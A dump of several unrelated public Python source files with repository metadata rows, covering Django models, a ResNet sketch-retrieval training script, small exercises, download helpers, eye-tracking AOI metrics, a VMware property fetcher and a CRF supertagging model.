class ReducedDocs(DjangoDocument):
structure={
'content':dict, #This contains the content in the dictionary format
'orignal_id':ObjectId,
'required_for':unicode,
'is_indexed':bool, #This will be true if the map reduced document has been indexed.If it is not then it will be false
}
use_dot_notation = True
class ToReduceDocs(DjangoDocument):
structure={
'doc_id':ObjectId,
'required_for':unicode,
}
use_dot_notation = True
class IndexedWordList(DjangoDocument):
structure={
'word_start_id':float,
'words':dict,
'required_for':unicode,
}
use_dot_notation = True
#word_start_id = 0 --- a ,1---b,2---c .... 25---z,26--misc.
# Create your models here.
| [
"pranavgupta3131@gmail.com"
] | pranavgupta3131@gmail.com |
2d6fced001982c85bda4c3008e1f9051ce24ffda | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_14387.py | 1a3c8e77f0bda5b6a8b9a9699422269adf3d924c | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | # Python Celery Task.update_state potentially blocks forever
BROKER_POOL_LIMIT=100
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
db15c5b278b0546d1a6f99bd0e0dd0a6fa69804d | 1569d2ded6f0f4821eee1afffcde56091e75ee91 | /test_ert_gs.py | 2c71831041fa0257f5dffd433da7cd52d77da659 | [] | no_license | moziyu/ALTianChi | 7ce19a2767008bcceadf1b1b97ab9fff7b926634 | 4d2cba4cfcf28e57e2fb33fbbfc2bb8068a8dfad | refs/heads/master | 2021-01-22T19:04:38.232174 | 2017-03-16T06:51:26 | 2017-03-16T06:51:26 | 85,158,430 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | from models.ert_gs_regress import ert_gs_regress
if __name__=='__main__':
ert_gs_regress() | [
"wrzhen@163.com"
] | wrzhen@163.com |
9f927ff07dcec58f1a39ba3790c0f02454bd8b41 | 7494f6791b27ab7a8e33db3fa16040471e4552fd | /sketch_based_image_retrieval/resnet_init.py | fb8f2c3bac5b8082a779c0edcc37f0a8dc615dbb | [] | no_license | lindaCai1997/neural_nets | f2232b7f7fd72cba67a2e1e7cee290232973a58f | 79b731f963bdac99913352083b6e15ee4147d6bf | refs/heads/master | 2020-09-13T22:47:45.168385 | 2016-09-07T04:58:31 | 2016-09-07T04:58:31 | 67,542,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,397 | py | import skimage.io
import skimage.transform
import tensorflow as tf
import numpy as np
from numpy import array
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.training import moving_averages
import datetime
import os
import time
''' This pretraining network is a reconstruction based on memory of
https://github.com/ry/tensorlow-resnet/blob/master/resnet.py
It's only meant as an exercise for the author and by no means replaces the orginial resnet
function order(up to down): define variable, single layer,
block of layers, stack of blocks, full network( without loss function ), training function
'''
MOMENTUM = 0.9
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('photo_train_dir', 'photo/train_variables',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_string('sketch_train_dir', 'sketch/train_variables',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_string('combined_train_dir', 'combine_train_variables',
"""Derectory where to write event logs """)
tf.app.flags.DEFINE_float('learning_rate', 0.001, "learning rate.")
tf.app.flags.DEFINE_integer('batch_size', 16, "batch size")
tf.app.flags.DEFINE_integer('max_steps', 500000, "max steps")
tf.app.flags.DEFINE_boolean('resume', False,
'resume from latest saved state')
tf.app.flags.DEFINE_boolean('minimal_summaries', True,
'produce fewer summaries to save HD space')
MOVING_AVERAGE_DECAY = 0.9997
BN_DECAY = MOVING_AVERAGE_DECAY
BN_EPSILON = 0.001
CONV_WEIGHT_DECAY = 0.00004
CONV_WEIGHT_STDDEV = 0.1
FC_WEIGHT_DECAY = 0.00004
FC_WEIGHT_STDDEV = 0.01
RESNET_VARIABLES = 'resnet_variables'
UPDATE_OPS_COLLECTION = 'resnet_update_ops' # must be grouped with training op
RESTORE = True
activation = tf.nn.relu
# ==========wrapper function to initialize a variable================
def _get_variable(name, shape, initializer, weight_decay = 0.0,
dtype = 'float', trainable=True):
'''A little wrapper around tf.get_variable to do weight decay and
add to resnet collection
'''
if weight_decay > 0:
regularizer = tf.contrib.layers.l2_regularizer(weight_decay)
else:
regularizer = None
collections = [tf.GraphKeys.VARIABLES, RESNET_VARIABLES]
return tf.get_variable(name, shape=shape, initializer=initializer,
dtype=dtype, regularizer=regularizer, collections=collections, trainable=trainable)
# ===================================================================
# ===========wrapper functions to define network layers==============
def conv(x, size, num_units_out):
num_units_in = x.get_shape()[3]
shape = [size, size, num_units_in, num_units_out]
initializer = tf.truncated_normal_initializer(stddev=CONV_WEIGHT_STDDEV)
w = _get_variable('weights', shape=shape, dtype='float',
initializer=initializer, weight_decay=CONV_WEIGHT_DECAY)
return tf.nn.conv2d(x, w, strides=[1, 1, 1, 1], padding = 'SAME')
def fc(x, num_units_out):
num_units_in = x.get_shape()[1]
weight_initializer = tf.truncated_normal_initializer(stddev=FC_WEIGHT_STDDEV)
weights = _get_variable('weights', shape=[num_units_in, num_units_out],
initializer=weight_initializer, weight_decay=FC_WEIGHT_STDDEV)
biases = _get_variable('biases', shape=[num_units_out], initializer=tf.zeros_initializer)
return tf.nn.xw_plus_b(x, weights, biases)
def _max_pool(x, size, step):
return tf.nn.max_pool(x, ksize = [1, size, size, 1], strides = [1, step, step, 1], padding = 'SAME')
def bn(x, use_bias=False, is_training=True):
is_training = tf.convert_to_tensor(is_training, dtype='bool', name='is_training')
x_shape = x.get_shape()
params_shape = x_shape[-1:]
if use_bias:
bias = _get_variable('bias', params_shape, initializer=tf.zeros_initializer)
return x + bias
axis = list(range(len(x_shape) - 1))
beta = _get_variable('beta', params_shape, initializer=tf.zeros_initializer)
gamma = _get_variable('gamma', params_shape, initializer=tf.ones_initializer)
moving_mean = _get_variable('moving_mean', params_shape,
initializer=tf.zeros_initializer, trainable=False)
moving_variance = _get_variable('moving_variance', params_shape,
initializer=tf.ones_initializer, trainable=False)
mean, variance = tf.nn.moments(x, axis)
update_moving_mean = moving_averages.assign_moving_average(moving_mean, mean, BN_DECAY)
update_moving_variance = moving_averages.assign_moving_average(moving_variance, variance, BN_DECAY)
tf.add_to_collection(UPDATE_OPS_COLLECTION, update_moving_mean)
tf.add_to_collection(UPDATE_OPS_COLLECTION, update_moving_variance)
mean, variance = control_flow_ops.cond(is_training, lambda: (mean, variance), lambda: (moving_mean, moving_variance))
x = tf.nn.batch_normalization(x, mean, variance, beta, gamma, BN_EPSILON)
return x
def loss(logits, labels):
weird = logits.get_shape()
two = labels.get_shape()
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels)
cross_entropy_mean = tf.reduce_mean(cross_entropy)
regularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
loss_ = tf.add_n([cross_entropy_mean] + regularization_losses)
tf.scalar_summary('loss', loss_)
return loss_
#================================================================================
#========helper function to define a block of resnet layers======================
def block(x, size, bottleneck, block_filter_internal, is_training, use_bias):
filters_in = x.get_shape()[-1]
# print filters_in
m = 4 if bottleneck else 1
filters_out = m*block_filter_internal
shortcut = x
if bottleneck:
num_units_out = block_filter_internal
with tf.varable_scope('a'):
size = 1
x = conv(x, size, num_units_out)
x = bn(x, use_bias, is_training)
x = activation(x)
with tf.variable_scope('b'):
x = conv(x, size, num_units_out)
x = bn(x, use_bias, is_training)
x = activation(x)
with tf.variable_scope('c'):
size = 1
num_units_out = filters_out
x = conv(x, size, num_units_out)
x = bn(x, use_bias, is_training)
else:
size = 3
num_units_out = block_filter_internal
with tf.variable_scope('A'):
x = conv(x, size, num_units_out)
x = bn(x, use_bias, is_training)
x = activation(x)
with tf.variable_scope('B'):
x = conv(x, size, num_units_out)
x = bn(x, use_bias, is_training)
with tf.variable_scope('shortcut'):
if filters_out != filters_in:
size = 1
shortcut = conv(shortcut, size, filters_out)
shortcut = bn(shortcut, use_bias=use_bias, is_training=is_training)
return activation(x + shortcut)
# ===============================================================================
# ======== a stack of full 6 block===============================================
def stack(x, size, num_blocks, bottleneck, block_filter_internal, is_training, use_bias):
for n in range(num_blocks):
with tf.variable_scope('block%d' % (n + 1)):
x = block(x, size, bottleneck, block_filter_internal, is_training, use_bias)
return x
#================================================================================
#=========full network========================================
def network_init(x, is_training, num_classes=125, num_blocks=[2, 2, 2 ,2], bottleneck=False,
use_bias=False):
fc_units_out = num_classes
pool_step = 2
with tf.variable_scope('scale1'):
size = 7
num_units_out = 64
x = conv(x, size, num_units_out)
x = bn(x, use_bias, is_training)
x = activation(x)
step = 2
with tf.variable_scope('scale2'):
size = 3
step = 2
block_filter_internal = 64
x = _max_pool(x, size, step)
x = stack(x, size, num_blocks[0], bottleneck, block_filter_internal, is_training, use_bias)
with tf.variable_scope('scale3'):
size = 3
block_filter_internal = 128
x = _max_pool(x, size, step)
x = stack(x, size, num_blocks[1], bottleneck, block_filter_internal, is_training, use_bias)
with tf.variable_scope('scale4'):
size = 3
block_filter_internal = 256
x = _max_pool(x, size, step)
x = stack(x, size, num_blocks[2], bottleneck, block_filter_internal, is_training, use_bias)
with tf.variable_scope('scale5'):
size = 3
block_filter_internal = 512
x = _max_pool(x, size, step)
x = stack(x, size, num_blocks[3], bottleneck, block_filter_internal, is_training, use_bias)
x = tf.reduce_mean(x, reduction_indices=[1, 2], name="avg_pool")
if num_classes != None:
with tf.variable_scope('fc'):
x = fc(x, num_classes)
return x
# =============================================================================
def pre_train_photo(photos, shuffle):
if not os.path.exists(FLAGS.photo_train_dir):
os.makedirs(FLAGS.photo_train_dir)
batch_size = 100
images = tf.placeholder(tf.float32, shape = [None, 66, 100, 3])
labels = tf.placeholder(tf.int64, shape = [None])
sess = tf.InteractiveSession()
logits = network_init(images, is_training=True, num_classes=125, num_blocks=[2, 2, 2, 2],
bottleneck=False)
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0),
trainable=False)
val_step = tf.get_variable('val_step', [], initializer=tf.constant_initializer(0),
trainable=False)
loss_ = loss(logits, labels)
predictions = tf.nn.softmax(logits)
in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))
num_correct = tf.reduce_sum(in_top1)
top_1_error = (batch_size - num_correct) / batch_size
test_size = photos.test.images.shape[0]
test_error = (test_size - num_correct) / test_size
train_step = tf.train.AdamOptimizer(1e-4).minimize(loss_)
saver = tf.train.Saver(tf.all_variables())
# summary_writer = tf.train.SummaryWriter(FLAGS.train_dir, sess.graph)
sess.run(tf.initialize_all_variables())
if (RESTORE == True):
latest = tf.train.latest_checkpoint(FLAGS.photo_train_dir)
if latest == None:
print "no saved record found"
else:
print "resume", latest
saver.restore(sess, latest)
for i in range(2000):
batch_size = 100
batch = photos.next_batch(batch_size, True, shuffle)
train_step.run(feed_dict={images: batch.images, labels: batch.labels})
error = top_1_error.eval(feed_dict={images: batch.images,
labels: batch.labels})
print 'Step', i, 'Training error:', error
if (i % 100 == 99):
avg_error = avg_error/100
error = test_error.eval(feed_dict={images: photos.test.images, labels: photos.test.labels})
print 'Training error average:', avg_error
print 'Testing error:', error
checkpoint_path = os.path.join(FLAGS.sketch_train_dir, 'model.ckpt')
open(checkpoint_path, "w+")
saver.save(sess, checkpoint_path, global_step=global_step)
avg_error = 0.0
# ===============================================================================
def pre_train_sketch(sketches, shuffle):
if not os.path.exists(FLAGS.sketch_train_dir):
os.makedirs(FLAGS.sketch_train_dir)
batch_size = 100
images = tf.placeholder(tf.float32, shape = [None, 66, 100, 1])
labels = tf.placeholder(tf.int64, shape = [None])
sess = tf.InteractiveSession()
logits = network_init(images, is_training=True, num_classes=125, num_blocks=[2, 2, 2, 2],
bottleneck=False)
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0),
trainable=False)
val_step = tf.get_variable('val_step', [], initializer=tf.constant_initializer(0),
trainable=False)
loss_ = loss(logits, labels)
predictions = tf.nn.softmax(logits)
in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))
num_correct = tf.reduce_sum(in_top1)
top_1_error = (batch_size - num_correct) / batch_size
test_size = 100
test_error = (test_size - num_correct) / test_size
train_step = tf.train.AdamOptimizer(1e-4).minimize(loss_)
saver = tf.train.Saver(tf.all_variables())
sess.run(tf.initialize_all_variables())
# restore variable from previous training if specified
if (RESTORE == True):
latest = tf.train.latest_checkpoint(FLAGS.sketch_train_dir)
if latest == None:
print "no saved record found"
else:
print "resume", latest
saver.restore(sess, latest)
# start training
avg_error = 0.0;
for i in range(2000):
batch = sketches.next_batch(batch_size, True, shuffle)
train_step.run(feed_dict={images: batch.images, labels: batch.labels})
error = top_1_error.eval(feed_dict={images: batch.images, labels: batch.labels})
print 'Step', i, 'Training error:', error
avg_error += error
# After 100 times of training, test on validation set
# Save variables for future restoring
if (i % 100 == 0):
avg_error = avg_error/100
batch = sketches.next_batch(batch_size, False, shuffle)
error = test_error.eval(feed_dict={images: batch.images, labels: batch.labels})
print 'Training error average:', avg_error
print 'Testing error:', error
checkpoint_path = os.path.join(FLAGS.sketch_train_dir, 'model.ckpt')
open(checkpoint_path, "w+")
saver.save(sess, checkpoint_path, global_step=global_step)
avg_error = 0.0
return
# =========================================================================================
def pre_train_edgemaps(edgemaps, shuffle):
if not os.path.exists(FLAGS.sketch_train_dir):
os.makedirs(FLAGS.sketch_train_dir)
batch_size = 100
images = tf.placeholder(tf.float32, shape = [None, 66, 100, 1])
labels = tf.placeholder(tf.int64, shape = [None])
sess = tf.InteractiveSession()
logits = network_init(images, is_training=True, num_classes=125, num_blocks=[2, 2, 2, 2],
bottleneck=False)
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0),
trainable=False)
val_step = tf.get_variable('val_step', [], initializer=tf.constant_initializer(0),
trainable=False)
loss_ = loss(logits, labels)
predictions = tf.nn.softmax(logits)
in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))
num_correct = tf.reduce_sum(in_top1)
top_1_error = (batch_size - num_correct) / batch_size
test_size = 1000
test_error = (test_size - num_correct) / test_size
train_step = tf.train.AdamOptimizer(1e-4).minimize(loss_)
saver = tf.train.Saver(tf.all_variables())
sess.run(tf.initialize_all_variables())
# restore variable from previous training if specified
if (RESTORE == True):
latest = tf.train.latest_checkpoint(FLAGS.combined_train_dir)
if latest == None:
print "no saved record found"
else:
print "resume", latest
saver.restore(sess, latest)
# start training
avg_error = 0.0;
for i in range(2000):
batch = edgemaps.next_batch(batch_size, True, shuffle)
train_step.run(feed_dict={images: batch.images, labels: batch.labels})
error = top_1_error.eval(feed_dict={images: batch.images, labels: batch.labels})
print 'Step', i, 'Training error:', error
avg_error += error
# After 100 times of training, test on validation set
# Save variables for future restoring
if (i % 100 == 0):
avg_error = avg_error/100
batch = edgemaps.next_batch(batch_size, False, shuffle)
error = test_error.eval(feed_dict={images: batch.images, labels: batch.labels})
print 'Training error average:', avg_error
print 'Testing error:', error
checkpoint_path = os.path.join(FLAGS.combined_train_dir, 'model.ckpt')
open(checkpoint_path, "w+")
saver.save(sess, checkpoint_path, global_step=global_step)
avg_error = 0.0
return | [
"tcai4@illinois.edu"
] | tcai4@illinois.edu |
4544e9694446fd03dbbdaa647b3ffb6d8e6363ec | fa97547f32367535436e112e1da8d61dcb3ebd90 | /ex18.py | 57d230a2f63b2db524b03ee086552f4bf7b0fc34 | [] | no_license | wufei74/lpthw | f7bf5c9ccad7bac6e42035c87aeb1d6d13f466e9 | b974f924e71c14b25d26b51f4045be3134bfb85c | refs/heads/master | 2022-12-01T16:30:12.670126 | 2020-08-16T00:32:51 | 2020-08-16T00:32:51 | 285,600,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 29 19:24:57 2020
@author: WufeiNewPC
"""
#ex18.py
# this one is like your scripts with argv
def print_two(*args):
arg1, arg2, arg3 = args
print(f"arg1: {arg1}, arg2: {arg2}")
print(args)
# ok, that *args is actually pointless, we can just do this
def print_two_again(arg1, arg2):
print(f"arg1: {arg1}, arg2: {arg2}")
#this just takes one argument
def print_one(arg1):
print(f"arg1: {arg1}")
print(arg1)
#@this one takes no arguments
def print_none():
print("I got nothin.'.", flush=True)
print_two("Zed", "Shaw", "fdasfsda")
print_two_again("Zed", "Shaw")
print_one("First!")
print_none()
| [
"noreply@github.com"
] | wufei74.noreply@github.com |
c86b19c4c30e2fabbe0d81972a65af9e5be88efe | de6dc75873bd8615d22dd25c51f2fe3bc82cd7f8 | /069.猜数字游戏.py | 07de0ac470912f9fd6bb2e924865ff59a1419c0a | [] | no_license | cuimin07/LeetCode-test | b9e87b4e353b09dfa84f62c24c2950d57656fff2 | 8f02b78dcbdefa154bb52c14a271998361e92a86 | refs/heads/master | 2020-08-14T13:37:27.799071 | 2020-01-13T03:11:40 | 2020-01-13T03:11:40 | 215,178,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,670 | py | '''
你正在和你的朋友玩 猜数字(Bulls and Cows)游戏:你写下一个数字让你的朋友猜。
每次他猜测后,你给他一个提示,告诉他有多少位数字和确切位置都猜对了(称为“Bulls”, 公牛),
有多少位数字猜对了但是位置不对(称为“Cows”, 奶牛)。你的朋友将会根据提示继续猜,直到猜出秘密数字。
请写出一个根据秘密数字和朋友的猜测数返回提示的函数,用 A 表示公牛,用 B 表示奶牛。
请注意秘密数字和朋友的猜测数都可能含有重复数字。
示例 1:
输入: secret = "1807", guess = "7810"
输出: "1A3B"
解释: 1 公牛和 3 奶牛。公牛是 8,奶牛是 0, 1 和 7。
示例 2:
输入: secret = "1123", guess = "0111"
输出: "1A1B"
解释: 朋友猜测数中的第一个 1 是公牛,第二个或第三个 1 可被视为奶牛。
说明: 你可以假设秘密数字和朋友的猜测数都只包含数字,并且它们的长度永远相等。
'''
#答:
class Solution:
def getHint(self, secret: str, guess: str) -> str:
A,B=0,0
dic1,dic2={},{}
siz=len(secret)
for i in range(siz):
if secret[i]==guess[i]:
A+=1
else:
if secret[i] not in dic1:
dic1[secret[i]]=1
else:
dic1[secret[i]]+=1
if guess[i] not in dic2:
dic2[guess[i]]=1
else:
dic2[guess[i]]+=1
for x in dic1:
if x in dic2:
B+=min(dic1[x],dic2[x])
return str(A)+'A'+str(B)+'B'
| [
"noreply@github.com"
] | cuimin07.noreply@github.com |
e62f212ff2c79b3fc7237b9f611dd62f31bf1153 | 1498a42a13fb6148cd0c100226c7aeeffe537d15 | /app/utils.py | facff88c34963a6bb8f902ae73c26a5bb9875249 | [] | no_license | perseptron/autopark_fill | 68b5f27fa921b8871551111ac9be2251fd2e811b | e70089b5b327400e9794f6e9efc9c7a529d589e2 | refs/heads/master | 2023-05-08T04:49:50.455264 | 2021-04-24T10:07:31 | 2021-04-24T10:07:31 | 355,658,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,359 | py | import zipfile
import requests
def download(url, file, **kwargs):
progress = kwargs.get('progress', None)
prev = 0
with requests.get(url, stream=True) as r:
r.raise_for_status()
total = int(r.headers['content-length']) # <- ptb probably already knows "size"
with open(file, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
if progress:
cur = round(f.tell()/total*100)
if cur - prev > 0.5:
progress(cur, total) # <- added callback
prev = cur
def unzip(file_path, **kwargs):
progress = kwargs.get('progress', None)
zf = zipfile.ZipFile(file_path)
uncompress_size = sum((file.file_size for file in zf.infolist()))
extracted_size = 0
for file in zf.infolist():
extracted_size += file.file_size
if progress:
progress(extracted_size, uncompress_size)
zf.extract(file)
return zf.infolist()
def get_lines_count(file_path):
print('counting...')
count = 0
thefile = open(file_path, 'rb')
while 1:
buffer = thefile.read(8192 * 1024)
if not buffer: break
count += buffer.count(b'\n')
thefile.close()
return count | [
"perseptron@gmail.com"
] | perseptron@gmail.com |
56d6a92721146f71b6758e01c2158030aa8da632 | 912b0c50b7f07e837dbbe5d784e9e3c62f484b96 | /old_Nick/AOI.py | 907b6cb6dc1c46167f6c24491291b1f1eaacbb03 | [] | no_license | oschmid/EMDAT | 5237f8309a24b71cb91b4f6c2e447fd56298eb9d | ea5f2a41a52b888935e4a7b8f0eb1481c3989e4d | refs/heads/master | 2021-01-18T13:32:51.095366 | 2012-06-19T18:05:23 | 2012-06-19T18:05:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,678 | py | from utils import *
class AOI():
def __init__(self, aid, polyin, polyout, fixation_data, starttime, endtime,
aois):
self.aid = aid
self.polyin = polyin
self.polyout = polyout
fixation_indices = filter(lambda i: fixation_in_aoi(fixation_data[i],
polyin, polyout), range(len(fixation_data)))
fixations = map(lambda i: fixation_data[i], fixation_indices)
self.numfixations = len(fixations)
self.longestfixation = -1
self.timetofirstfixation = -1
self.timetolastfixation = -1
self.proportionnum = 0
self.totaltimespent = sum(map(lambda x: x.fixationduration, fixations))
self.proportiontime = float(self.totaltimespent)/(endtime - starttime)
if self.numfixations > 0:
self.longestfixation = max(map(lambda x: x.fixationduration,
fixations))
self.timetofirstfixation = fixations[0].timestamp - starttime
self.timetolastfixation = fixations[-1].timestamp - starttime
self.proportionnum = float(self.numfixations)/len(fixation_data)
self.numtransto = {}
self.numtransfrom = {}
for (aid, x, y) in aois:
self.numtransto[aid] = 0
self.numtransfrom[aid] = 0
for i in fixation_indices:
if i > 0:
for (aid, polyin, polyout) in aois:
if fixation_in_aoi(fixation_data[i-1], polyin, polyout):
self.numtransfrom[aid]+=1
if i < len(fixation_data)-2:
for (aid, polyin, polyout) in aois:
if fixation_in_aoi(fixation_data[i+1], polyin, polyout):
self.numtransto[aid]+=1
self.proptransto = {}
self.proptransfrom = {}
sumtransto = sum(self.numtransto.values())
sumtransfrom = sum(self.numtransfrom.values())
for key, val in self.numtransto.items():
if sumtransto > 0:
self.proptransto[key] = float(self.numtransto[key]) / sumtransto
else:
self.proptransto[key] = 0
for key, val in self.numtransfrom.items():
if sumtransfrom > 0:
self.proptransfrom[key] = float(self.numtransfrom[key]) / sumtransfrom
else:
self.proptransfrom[key] = 0
def fixation_in_aoi(fixation, polyin, polyout):
return point_inside_polygon(fixation.mappedfixationpointx,
fixation.mappedfixationpointy, polyin) and not point_inside_polygon(fixation.mappedfixationpointx,
fixation.mappedfixationpointy, polyout)
| [
"bensteichen@gmail.com"
] | bensteichen@gmail.com |
2bb733a96a9e609fee6a44d8e62dcfec06623420 | 7b82fa85a26ecef6580c7744b321d25d4215ecd3 | /4finalSummary.py | 087eee6ed532f52874bbcaa0281d86ad7f0c7f94 | [] | no_license | fangzhao2019/Character-encoding-analysis | cdd3ba03ef130abb002655d2d63ef669ed23c48a | 870b936eebff78a44a6ef06ccee94254e361d563 | refs/heads/master | 2023-04-10T14:57:11.213421 | 2023-03-15T16:20:31 | 2023-03-15T16:20:31 | 322,670,350 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 938 | py | from openpyxl import load_workbook
import os
path='cluster_results'
recogResult={}
wordNames=os.listdir(path)
wordNames.remove('null')
a=0
for word in wordNames:
imageNames=os.listdir('%s/%s'%(path,word))
a+=len(imageNames)
for imageName in imageNames:
ttf_name,image=imageName.split('_uni')
code=image.replace('.png','')
if not ttf_name in recogResult.keys():
recogResult[ttf_name]={}
recogResult[ttf_name][code]=word
wb=load_workbook('coding3.xlsx')
ws=wb.active
for i in range(2,ws.max_row+1):
ttf_name=ws.cell(row=i,column=2).value
code=ws.cell(row=i,column=3).value
word=ws.cell(row=i,column=4).value
try:
new_word=recogResult[ttf_name][code]
ws.cell(row=i,column=7).value=new_word
except:
ws.cell(row=i,column=7).value='CHANGE'
if i%1000==0:
print('已处理数据%d条'%i)
i+=1
wb.save('finalCoding.xlsx')
| [
"1311778207@qq.com"
] | 1311778207@qq.com |
e686b01403ab17049ad212cde428b766ca9b55f6 | 973b40c806bfcfdfbe4258b3decd9e52f8d4b574 | /vmware_exporter/helpers.py | e6df9262e3710f638050d836a6405a66c56421ae | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | gitter-badger/vmware_exporter | 467507e83551134f2e89b7fb3125bccb949113d4 | d805dde7ff768d55e96719fcd727a6f4b5e81dc7 | refs/heads/master | 2020-04-13T17:06:59.370635 | 2018-12-24T05:19:48 | 2018-12-24T05:19:48 | 163,339,090 | 0 | 0 | null | 2018-12-27T21:53:31 | 2018-12-27T21:53:31 | null | UTF-8 | Python | false | false | 1,375 | py | from pyVmomi import vmodl
def batch_fetch_properties(content, obj_type, properties):
view_ref = content.viewManager.CreateContainerView(
container=content.rootFolder,
type=[obj_type],
recursive=True
)
PropertyCollector = vmodl.query.PropertyCollector
# Describe the list of properties we want to fetch for obj_type
property_spec = PropertyCollector.PropertySpec()
property_spec.type = obj_type
property_spec.pathSet = properties
# Describe where we want to look for obj_type
traversal_spec = PropertyCollector.TraversalSpec()
traversal_spec.name = 'traverseEntities'
traversal_spec.path = 'view'
traversal_spec.skip = False
traversal_spec.type = view_ref.__class__
obj_spec = PropertyCollector.ObjectSpec()
obj_spec.obj = view_ref
obj_spec.skip = True
obj_spec.selectSet = [traversal_spec]
filter_spec = PropertyCollector.FilterSpec()
filter_spec.objectSet = [obj_spec]
filter_spec.propSet = [property_spec]
props = content.propertyCollector.RetrieveContents([filter_spec])
results = {}
for obj in props:
properties = {}
properties['obj'] = obj.obj
properties['id'] = obj.obj._moId
for prop in obj.propSet:
properties[prop.name] = prop.val
results[obj.obj._moId] = properties
return results
| [
"noreply@github.com"
] | gitter-badger.noreply@github.com |
80c52a096b50d0287dba9cba6163b81cb10c9a7a | b7c3e641ad5874db8e9bec371b581e4063fe3efc | /tf_function_test.py | 50e5052139b0936959624f915fe460ab23da138e | [] | no_license | rekyyang/resnet-fcn-tensorflow | 469037f05e3138f843a97997e822705173a3655a | e518c4da676a57e837de197c543995e99b6ef89c | refs/heads/master | 2020-04-01T20:36:10.229812 | 2018-10-25T11:39:50 | 2018-10-25T11:39:50 | 153,611,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,389 | py | import tensorflow as tf
import numpy as np
import os
import cv2
def main():
a = np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])
image = tf.placeholder(tf.float32, [None, 2, 2])
print(image.shape)
bn = tf.layers.batch_normalization(image)
mean, var = tf.nn.moments(image, axes=[0])
image2 = tf.placeholder(tf.float32, [None, 256, 256, 3])
conv1 = tf.layers.conv2d_transpose(image2,
filters=6,
kernel_size=[1, 1],
# output_shape=[None, image2.shape[1]*2, image2.shape[2]*2, 6],
strides=[2, 2],
padding="SAME",
name="conv1")
print(conv1.shape)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
r = sess.run(mean, feed_dict={image: a})
print(a.shape[2])
return 0
if __name__ == "__main__":
filename = os.listdir("./dataset_train/train")
filename_queue = tf.train.string_input_producer(filename, shuffle=True, num_epochs=MAX_EPOCHS)
reader = tf.WholeFileReader()
key, value = reader.read(filename_queue)
tf.local_variables_initializer().run()
threads = tf.train.start_queue_runners(sess=sess)
# main()
| [
"noreply@github.com"
] | rekyyang.noreply@github.com |
9ba786b662513ca4cd8f52d4f6c974a781b6c899 | 5ae07391de50f1aec4dac6e03ff20deb46385c07 | /utils/obsolete/stagging_model_crf.py | ec00ae60f404ff8f4ea0eaf9c3a0d07b86d5262d | [] | no_license | jungokasai/bilstm_stagging | 361c895d63df667f8ff4981a863396e90ccdac8e | 80608daf38a101b1506967a7fc1db8fb2e298088 | refs/heads/master | 2021-01-01T19:54:39.293477 | 2019-03-08T01:21:07 | 2019-03-08T01:21:07 | 98,720,683 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 20,230 | py | from __future__ import print_function
from data_process_secsplit import Dataset
from stagging_model import Stagging_Model
from lstm import get_lstm_weights, lstm
from back_tracking import back_track
from crf import crf
import numpy as np
import tensorflow as tf
from tensorflow.contrib.seq2seq import sequence_loss
import os
import sys
import time
class Stagging_Model_CRF(Stagging_Model):
def feed_to_crf(self, inputs):
name = 'CRF'
with tf.variable_scope(name) as scope:
proj_U = tf.get_variable('weight', [self.outputs_dim, self.opts.lm])
proj_b = tf.get_variable('bias', [self.opts.lm])
outputs = tf.nn.relu(tf.matmul(inputs, proj_U)+proj_b)
return outputs
def add_final_projection(self, inputs, reuse=False, name=None):
if name is None:
name = 'Final_Projection'
with tf.variable_scope(name) as scope:
if reuse:
scope.reuse_variables()
proj_U = tf.get_variable('weight', [self.opts.lm, self.loader.nb_tags])
proj_b = tf.get_variable('bias', [self.loader.nb_tags])
outputs = tf.matmul(inputs, proj_U)+proj_b
return outputs
def add_stag_embedding_mat(self):
with tf.variable_scope('stag_embedding') as scope:
self.stag_embedding_mat = tf.get_variable('stag_embedding_mat', [self.loader.nb_tags+1, self.opts.lm, self.opts.lm+1]) # +1 for padding +1 for bias
def add_stag_dropout_mat(self, batch_size):
self.stag_dropout_mat = tf.ones([batch_size, self.opts.lm])
self.stag_dropout_mat = tf.nn.dropout(self.stag_dropout_mat, self.input_keep_prob)
def add_stag_embedding(self, stags=None): # if None, use gold stags
with tf.device('/cpu:0'):
if stags is None:
stags = self.inputs_placeholder_dict['tags']
inputs = tf.nn.embedding_lookup(self.stag_embedding_mat, stags) ## [batch_size, stag_dims]
return inputs
## Greedy Supertagging
def add_crf_path(self, crf_inputs, reuse=False):
batch_size = tf.shape(crf_inputs)[1]
